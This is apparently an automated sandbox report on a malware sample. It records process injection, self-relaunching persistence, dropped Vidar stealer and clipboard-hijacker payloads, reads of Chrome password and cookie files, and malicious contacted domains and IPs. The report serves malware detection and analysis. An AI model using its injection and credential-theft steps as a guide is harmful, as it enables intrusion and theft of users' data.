Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_0040A32F SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040A32F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004329EC
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004329BB SetUnhandledExceptionFilter,	2_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_05EA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_05EA0110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\R5391762lf.exe	Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

2_2_00419F90

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_05EC80F6 cpuid

0_2_05EC80F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_05ED3F87
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_05ED49EA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_05ED394D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_05ECC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05EE0AB6
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	2_2_0043404A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00438178
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00440116
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004382A2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_0043834F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_00438423
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: EnumSystemLocalesW,	2_2_004387C8
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,	2_2_0043884E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	2_2_00432B6D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	2_2_00432FAD
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_004335E7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	2_2_00437BB3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: EnumSystemLocalesW,	2_2_00437E27
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437E83
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437F00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	2_2_0042BF17
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00437F83
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_05DE3F87
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	5_2_05DE49EA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	5_2_05DE394D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	5_2_05DDC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_05DF0AB6
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_05EF3F87
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	6_2_05EF49EA
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	6_2_05EF394D
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	6_2_05EEC8B7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_05F00AB6

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_00409DFB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00409DFB

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00419F90

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_0042FE47

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00419F90

Source: C:\Users\user\Desktop\R5391762lf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
186.145.236.18	cajgtus.com	Colombia	14080	TelmexColombiaSACO	true
172.67.139.220	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false
95.217.9.149	unknown	Germany	24940	HETZNER-ASDE	false
186.13.17.220	sdfjhuz.com	Argentina	11664	TechtelLMDSComunicacionesInteractivasSAAR	true
23.66.133.162	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

Contacted Domains

Name	IP	Active
